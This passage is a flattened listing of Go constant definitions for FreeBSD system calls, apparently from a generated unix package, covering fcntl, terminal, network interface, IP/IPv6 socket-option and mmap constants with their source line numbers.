F_SETLKW = 0xd constant F_SETLK_REMOTE (line 673) | F_SETLK_REMOTE = 0xe constant F_SETOWN (line 674) | F_SETOWN = 0x6 constant F_UNLCK (line 675) | F_UNLCK = 0x2 constant F_UNLCKSYS (line 676) | F_UNLCKSYS = 0x4 constant F_WRLCK (line 677) | F_WRLCK = 0x3 constant HUPCL (line 678) | HUPCL = 0x4000 constant HW_MACHINE (line 679) | HW_MACHINE = 0x1 constant ICANON (line 680) | ICANON = 0x100 constant ICMP6_FILTER (line 681) | ICMP6_FILTER = 0x12 constant ICRNL (line 682) | ICRNL = 0x100 constant IEXTEN (line 683) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 684) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 685) | IFAN_DEPARTURE = 0x1 constant IFCAP_WOL_MAGIC (line 686) | IFCAP_WOL_MAGIC = 0x2000 constant IFF_ALLMULTI (line 687) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 688) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 689) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 690) | IFF_CANTCHANGE = 0x218f72 constant IFF_CANTCONFIG (line 691) | IFF_CANTCONFIG = 0x10000 constant IFF_DEBUG (line 692) | IFF_DEBUG = 0x4 constant IFF_DRV_OACTIVE (line 693) | IFF_DRV_OACTIVE = 0x400 constant IFF_DRV_RUNNING (line 694) | IFF_DRV_RUNNING = 0x40 constant IFF_DYING (line 695) | IFF_DYING = 0x200000 constant IFF_KNOWSEPOCH (line 696) | IFF_KNOWSEPOCH = 0x20 constant IFF_LINK0 (line 697) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 698) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 699) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 700) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 701) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 702) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 703) | IFF_NOARP = 0x80 constant IFF_NOGROUP (line 704) | IFF_NOGROUP = 0x800000 constant IFF_OACTIVE (line 705) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 706) | IFF_POINTOPOINT = 0x10 constant IFF_PPROMISC (line 707) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 708) | IFF_PROMISC = 0x100 constant IFF_RENAMING (line 709) | IFF_RENAMING = 0x400000 constant IFF_RUNNING (line 710) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 711) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 712) | IFF_STATICARP = 0x80000 constant IFF_UP (line 713) | IFF_UP = 0x1 constant IFNAMSIZ (line 714) | IFNAMSIZ = 0x10 constant IFT_BRIDGE (line 715) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 716) | IFT_CARP = 0xf8 constant IFT_IEEE1394 (line 717) | IFT_IEEE1394 = 0x90 constant IFT_INFINIBAND (line 718) | IFT_INFINIBAND = 0xc7 constant IFT_L2VLAN (line 719) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 720) | IFT_L3IPVLAN = 0x88 constant IFT_PPP (line 721) | IFT_PPP = 0x17 constant IFT_PROPVIRTUAL (line 722) | IFT_PROPVIRTUAL = 0x35 constant IGNBRK (line 723) | IGNBRK = 0x1 constant IGNCR (line 724) | IGNCR = 0x80 constant IGNPAR (line 725) | IGNPAR = 0x4 constant IMAXBEL (line 726) | IMAXBEL = 0x2000 constant INLCR (line 727) | INLCR = 0x40 constant INPCK (line 728) | INPCK = 0x10 constant IN_CLASSA_HOST (line 729) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 730) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 731) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 732) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 733) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 734) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 735) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 736) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 737) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 738) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 739) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 740) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 741) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 742) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 743) | IN_LOOPBACKNET = 0x7f constant IN_NETMASK_DEFAULT (line 744) | IN_NETMASK_DEFAULT = 0xffffff00 constant IN_RFC3021_MASK (line 745) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 746) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 747) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 748) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 749) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 750) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 751) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 752) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 753) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 754) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 755) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 756) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 757) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 758) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 759) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 760) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 761) | IPPROTO_CPNX = 0x48 constant IPPROTO_DCCP (line 762) | IPPROTO_DCCP = 0x21 constant IPPROTO_DDP (line 763) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 764) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 765) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 766) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 767) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 768) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 769) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 770) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 771) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 772) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 773) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 774) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 775) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 776) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 777) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 778) | IPPROTO_HELLO = 0x3f constant IPPROTO_HIP (line 779) | IPPROTO_HIP = 0x8b constant IPPROTO_HMP (line 780) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 781) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 782) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 783) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 784) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 785) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 786) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 787) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 788) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 789) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 790) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 791) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 792) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 793) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 794) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 795) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 796) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 797) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 798) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 799) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 800) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 801) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 802) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 803) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 804) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 805) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 806) | IPPROTO_MAX = 0x100 constant IPPROTO_MEAS (line 807) | IPPROTO_MEAS = 0x13 constant IPPROTO_MH (line 808) | IPPROTO_MH = 0x87 constant IPPROTO_MHRP (line 809) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 810) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 811) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 812) | IPPROTO_MPLS = 0x89 constant IPPROTO_MTP (line 813) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 814) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 815) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 816) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 817) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 818) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 819) | IPPROTO_NVPII = 0xb constant IPPROTO_OLD_DIVERT (line 820) | IPPROTO_OLD_DIVERT = 0xfe constant IPPROTO_OSPFIGP (line 821) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 822) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 823) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 824) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 825) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 826) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 827) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 828) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 829) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 830) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 831) | IPPROTO_RDP = 0x1b constant IPPROTO_RESERVED_253 (line 832) | IPPROTO_RESERVED_253 = 0xfd constant IPPROTO_RESERVED_254 (line 833) | IPPROTO_RESERVED_254 = 0xfe constant IPPROTO_ROUTING (line 834) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 835) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 836) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 837) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 838) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 839) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 840) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 841) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEND (line 842) | IPPROTO_SEND = 0x103 constant IPPROTO_SHIM6 (line 843) | IPPROTO_SHIM6 = 0x8c constant IPPROTO_SKIP (line 844) | IPPROTO_SKIP = 0x39 constant IPPROTO_SPACER (line 845) | IPPROTO_SPACER = 0x7fff constant IPPROTO_SRPC (line 846) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 847) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 848) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 849) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 850) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 851) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 852) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 853) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 854) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 855) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 856) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 857) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 858) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 859) | IPPROTO_UDPLITE = 0x88 constant IPPROTO_VINES (line 860) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 861) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 862) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 863) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 864) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 865) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 866) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 867) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 868) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDANY (line 869) | IPV6_BINDANY = 0x40 constant IPV6_BINDMULTI (line 870) | IPV6_BINDMULTI = 0x41 constant IPV6_BINDV6ONLY (line 871) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 872) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 873) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 874) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 875) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 876) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 877) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWID (line 878) | IPV6_FLOWID = 0x43 constant IPV6_FLOWINFO_MASK (line 879) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_LEN (line 880) | IPV6_FLOWLABEL_LEN = 0x14 constant IPV6_FLOWLABEL_MASK (line 881) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOWTYPE (line 882) | IPV6_FLOWTYPE = 0x44 constant IPV6_FRAGTTL (line 883) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 884) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 885) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 886) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 887) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 888) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 889) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 890) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 891) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 892) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 893) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 894) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 895) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 896) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 897) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 898) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 899) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 900) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MMTU (line 901) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 902) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 903) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 904) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 905) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 906) | IPV6_NEXTHOP = 0x30 constant IPV6_ORIGDSTADDR (line 907) | IPV6_ORIGDSTADDR = 0x48 constant IPV6_PATHMTU (line 908) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 909) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 910) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 911) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 912) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 913) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 914) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 915) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVFLOWID (line 916) | IPV6_RECVFLOWID = 0x46 constant IPV6_RECVHOPLIMIT (line 917) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 918) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVORIGDSTADDR (line 919) | IPV6_RECVORIGDSTADDR = 0x48 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRSSBUCKETID (line 922) | IPV6_RECVRSSBUCKETID = 0x47 constant IPV6_RECVRTHDR (line 923) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 924) | IPV6_RECVTCLASS = 0x39 constant IPV6_RSSBUCKETID (line 925) | IPV6_RSSBUCKETID = 0x45 constant IPV6_RSS_LISTEN_BUCKET (line 926) | IPV6_RSS_LISTEN_BUCKET = 0x42 constant IPV6_RTHDR (line 927) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 928) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 929) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 930) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 931) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 932) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 933) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 934) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 935) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 936) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 937) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 938) | IPV6_VERSION_MASK = 0xf0 constant IPV6_VLAN_PCP (line 939) | IPV6_VLAN_PCP = 0x4b constant IP_ADD_MEMBERSHIP (line 940) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 941) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BINDANY (line 942) | IP_BINDANY = 0x18 constant IP_BINDMULTI (line 943) | IP_BINDMULTI = 0x19 constant IP_BLOCK_SOURCE (line 944) | IP_BLOCK_SOURCE = 0x48 constant IP_DEFAULT_MULTICAST_LOOP (line 945) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 946) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 947) | IP_DF = 0x4000 constant IP_DONTFRAG (line 948) | IP_DONTFRAG = 0x43 constant IP_DROP_MEMBERSHIP (line 949) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 950) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET3 (line 951) | IP_DUMMYNET3 = 0x31 constant IP_DUMMYNET_CONFIGURE (line 952) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 953) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 954) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 955) | IP_DUMMYNET_GET = 0x40 constant IP_FLOWID (line 956) | IP_FLOWID = 0x5a constant IP_FLOWTYPE (line 957) | IP_FLOWTYPE = 0x5b constant IP_FW3 (line 958) | IP_FW3 = 0x30 constant IP_FW_ADD (line 959) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 960) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 961) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 962) | IP_FW_GET = 0x36 constant IP_FW_NAT_CFG (line 963) | IP_FW_NAT_CFG = 0x38 constant IP_FW_NAT_DEL (line 964) | IP_FW_NAT_DEL = 0x39 constant IP_FW_NAT_GET_CONFIG (line 965) | IP_FW_NAT_GET_CONFIG = 0x3a constant IP_FW_NAT_GET_LOG (line 966) | IP_FW_NAT_GET_LOG = 0x3b constant IP_FW_RESETLOG (line 967) | IP_FW_RESETLOG = 0x37 constant IP_FW_TABLE_ADD (line 968) | IP_FW_TABLE_ADD = 0x28 constant IP_FW_TABLE_DEL (line 969) | IP_FW_TABLE_DEL = 0x29 constant IP_FW_TABLE_FLUSH (line 970) | IP_FW_TABLE_FLUSH = 0x2a constant IP_FW_TABLE_GETSIZE (line 971) | IP_FW_TABLE_GETSIZE = 0x2b constant IP_FW_TABLE_LIST (line 972) | IP_FW_TABLE_LIST = 0x2c constant IP_FW_ZERO (line 973) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 974) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 975) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 976) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 977) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 978) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 979) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 980) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 981) | IP_MF = 0x2000 constant IP_MINTTL (line 982) | IP_MINTTL = 0x42 constant IP_MSFILTER (line 983) | IP_MSFILTER = 0x4a constant IP_MSS (line 984) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 985) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 986) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 987) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 988) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 989) | IP_OFFMASK = 0x1fff constant IP_ONESBCAST (line 990) | IP_ONESBCAST = 0x17 constant IP_OPTIONS (line 991) | IP_OPTIONS = 0x1 constant IP_ORIGDSTADDR (line 992) | IP_ORIGDSTADDR = 0x1b constant IP_PORTRANGE (line 993) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 994) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 995) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 996) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 997) | IP_RECVDSTADDR = 0x7 constant IP_RECVFLOWID (line 998) | IP_RECVFLOWID = 0x5d constant IP_RECVIF (line 999) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 1000) | IP_RECVOPTS = 0x5 constant IP_RECVORIGDSTADDR (line 1001) | IP_RECVORIGDSTADDR = 0x1b constant IP_RECVRETOPTS (line 1002) | IP_RECVRETOPTS = 0x6 constant IP_RECVRSSBUCKETID (line 1003) | IP_RECVRSSBUCKETID = 0x5e constant IP_RECVTOS (line 1004) | IP_RECVTOS = 0x44 constant IP_RECVTTL (line 1005) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 1006) | IP_RETOPTS = 0x8 constant IP_RF (line 1007) | IP_RF = 0x8000 constant IP_RSSBUCKETID (line 1008) | IP_RSSBUCKETID = 0x5c constant IP_RSS_LISTEN_BUCKET (line 1009) | IP_RSS_LISTEN_BUCKET = 0x1a constant IP_RSVP_OFF (line 1010) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 1011) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 1012) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 1013) | IP_RSVP_VIF_ON = 0x11 constant IP_SENDSRCADDR (line 1014) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 1015) | IP_TOS = 0x3 constant IP_TTL (line 1016) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 1017) | IP_UNBLOCK_SOURCE = 0x49 constant IP_VLAN_PCP (line 1018) | IP_VLAN_PCP = 0x4b constant ISIG (line 1019) | ISIG = 0x80 constant ISTRIP (line 1020) | ISTRIP = 0x20 constant ITIMER_PROF (line 1021) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 1022) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 1023) | ITIMER_VIRTUAL = 0x1 constant IXANY (line 1024) | IXANY = 0x800 constant IXOFF (line 1025) | IXOFF = 0x400 constant IXON (line 1026) | IXON = 0x200 constant KERN_HOSTNAME (line 1027) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 1028) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 1029) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 1030) | KERN_VERSION = 0x4 constant LOCAL_CONNWAIT (line 1031) | LOCAL_CONNWAIT = 0x4 constant LOCAL_CREDS (line 1032) | LOCAL_CREDS = 0x2 constant LOCAL_CREDS_PERSISTENT (line 1033) | LOCAL_CREDS_PERSISTENT = 0x3 constant LOCAL_PEERCRED (line 1034) | LOCAL_PEERCRED = 0x1 constant LOCAL_VENDOR (line 1035) | LOCAL_VENDOR = 0x80000000 constant LOCK_EX (line 1036) | LOCK_EX = 0x2 constant LOCK_NB (line 1037) | LOCK_NB = 0x4 constant LOCK_SH (line 1038) | LOCK_SH = 0x1 constant LOCK_UN (line 1039) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 1040) | MADV_AUTOSYNC = 0x7 constant MADV_CORE (line 1041) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 1042) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1043) | MADV_FREE = 0x5 constant MADV_NOCORE (line 1044) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 1045) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 1046) | MADV_NOSYNC = 0x6 constant MADV_PROTECT (line 1047) | MADV_PROTECT = 0xa constant MADV_RANDOM (line 1048) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1049) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 1050) | MADV_WILLNEED = 0x3 constant MAP_32BIT (line 1051) | MAP_32BIT = 0x80000 constant MAP_ALIGNED_SUPER (line 1052) | MAP_ALIGNED_SUPER = 0x1000000 constant MAP_ALIGNMENT_MASK (line 1053) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1054) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1055) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1056) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 1057) | MAP_COPY = 0x2 constant MAP_EXCL (line 1058) | MAP_EXCL = 0x4000 constant MAP_FILE (line 1059) | MAP_FILE = 0x0 constant MAP_FIXED (line 1060) | MAP_FIXED = 0x10 constant MAP_GUARD (line 1061) | MAP_GUARD = 0x2000 constant MAP_HASSEMAPHORE (line 1062) | MAP_HASSEMAPHORE = 0x200 constant MAP_NOCORE (line 1063) | MAP_NOCORE = 0x20000 constant MAP_NOSYNC (line 1064) | MAP_NOSYNC = 0x800 constant MAP_PREFAULT_READ (line 1065) | MAP_PREFAULT_READ = 0x40000 constant MAP_PRIVATE (line 1066) | MAP_PRIVATE = 0x2 constant MAP_RESERVED0020 (line 1067) | MAP_RESERVED0020 = 0x20 constant MAP_RESERVED0040 (line 1068) | MAP_RESERVED0040 = 0x40 constant MAP_RESERVED0080 (line 1069) | MAP_RESERVED0080 = 0x80 constant MAP_RESERVED0100 (line 1070) | MAP_RESERVED0100 = 0x100 constant MAP_SHARED (line 1071) | MAP_SHARED = 0x1 constant MAP_STACK (line 1072) | MAP_STACK = 0x400 constant 